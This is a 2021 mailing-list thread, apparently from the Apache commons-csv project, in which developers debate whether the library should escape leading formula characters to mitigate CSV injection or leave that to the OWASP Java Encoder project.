Re: [csv] Does the library provide means to circumvent CSV injection

Matt Seil Thu, 11 Nov 2021 16:11:42 -0800

The TLDR version: OWASP's recommendation is specifically to render codeintended to be executed as unexecutable. I'd suggest a fix be done atOWASP-Java-Encoder project and not here. I believe the suggestion ofproviding this feature even at OWASP has near-zero value in the long runbecause the purpose of formulas in Excel IS to be executed--andMicrosoft already offers the best speed bump. Here be dragons!


cc'ing my partner in crime.


============================

I apologize. This is going to be a TLDR response because I don't knowany of you professionally so I'm erring on the side of completeness. Sincere apologies if I'm stating things you believe to be obvious, or ammyself ignorant of something obvious.

So I think there's a misunderstanding in regards to the threat describedby the OWASP article. The threat is explicitly *FORMULA *execution inExcel--and LibreOffice. It sounds similar to a browser problem but itsnot, its far worse. The reason why this particular threat tends to beout of bounds in bug bounty programs and in CTF contests is that theattack that exploits this is a social engineering attack which alwaysworks in the real world. Hence why bug bounties won't pay out for it.


The recommendation from OWASP is as follows:

Encode the offending characters to:

 * Equals to (|=|)
 * Plus (|+|)
 * Minus (|-|)
 * At (|@|)
 * Tab (|0x09|)
 * Carriage return (|0x0D|)
 * The set [;',"] be similarly escaped

While this would be a mitigation, it would also /_*purposefullybreak*_//_any formulas_/ placed into a csv cell. This is a criticalpoint, and I'll come back to it later. It's all or nothing.


This is where Phil's comment comes in:

"Maybe I'm misinterpreting something but I thought that it could be made
possible to configure CSVFormat-object when writing the CSV data in a
way that any data with possibly corrupting values (as shown on the OWASP
page) will mask the whole contents of the cell."

First, let me stress again the risk: The threat isn't masking cellcontents, its *execution *of normal logic in a malicious way. This isthe €1M question: "How do we differentiate corrupting values from validvalues?"

Asking this csv library to do it means it has to take on quite a bit ofintelligence. It doesn't just have to understand what a CSV format isanymore. It has to answer questions like "/*What's a corrupt equal signlook like?*/" And it looks like a valid equal sign. So to do thisright, you have to do lexical analysis and parsing the same way thatExcel is going to do it, and THEN you have to infer behavior.

Therefore to determine what corrupt characters look like given datadesigned to be executed you are now in the business of trying tointerpret what the excel formula is doing, in order to determine whetheror not its safe. This is the core problem: formulas are bits of/user-supplied/ /code /*designed to be executed*. If you escape it, youbreak it. At best, you annoy the hell out of the accountant who wasexpecting your web app to offer a usable spreadsheet, while adding onelayer of manual intervention other than the standard warning that MSOffice provides whenever you open an Excel not created on your machine.


So... what can we do about it?  Microsoft already did it:

IMHO there's nothing that any intermediary library can do that's anybetter than this. Web applications designed to take spreadsheets asinput are special beasts. The proper security rule of thumb is toalways ensure DATA is treated as DATA. But that rule gets *reallyfunky* when that DATA is actually supposed to be executable code. Butthat's your choice: if you don't want it to execute you have to forceit to be data, which will break execution by programmer intent.

However, I suspect a few of you will be unhappy with my "do nothing"suggestion and insist that something ought to be done.

I would recommend writing a CSV encoder for the owasp-java-encoderproject. https://github.com/OWASP/owasp-java-encoder The framework isalready in place and its where I push people if they only need encodingfunctions.

Why I wouldn't do it here: libraries like this have to be written tothe lowest-common-denominator, meaning csv format projects that don'thave Excel as a target. You want security functions to process as closeto the business logic as possible, and this is the wrong target forthat. Doing it here means not breaking legacy code, which means bydefault, the option will be off. (Or you follow a deprecationstrategy.) Further--this gets to my original hint about threatmodels--executing formulas in cells is a /desired function/ of Excel andits copies. When developers start breaking spreadsheets they're goingto revert to legacy behavior meaning you're really talking aboutimproving the defensive capability for the security-minded developersthat can stand up to the finance department. When OWASP tells you "Thisattack is difficult to mitigate," it isn't just the technical issuesinvolved--which I just outlined--its social. This is why I'm hesitantto offer up "We'll do it in ESAPI," because I don't see the value-add inthe bigger picture. Plus, _*/this is Microsoft's fault/*_ and I'm notthrilled with writing code to speedbump *their* problem. Which, I feelthey've addressed as well as they ever will.




On 11/11/2021 4:36 AM, P. Ottlinger wrote:

Hi guys,

thanks for your reply.

Maybe I'm misinterpreting something but I thought that it could be made
possible to configure CSVFormat-object when writing the CSV data in a
way that any data with possibly corrupting values (as shown on the OWASP
page) will mask the whole contents of the cell.

Thus a library such as commons-csv would be able to lower the risk for
CSV injection and not every client/customer would have to manually
create this protecting logic.

To my mind it's a simple parser for "dangerous" tokens that quotes the
given data with additional &quot; .... as we do not need to write
functioning Excel formulas into CSV.

WDYT?

Cheers,
Phil

Am 10.11.21 um 20:53 schrieb Gary Gregory:

I agree with Matt. CSV is just a container, it doesn't know or care what
the concept of a "formula" is.

Gary

Re: [csv] Does the library provide means to circumvent CSV injection

Reply via email to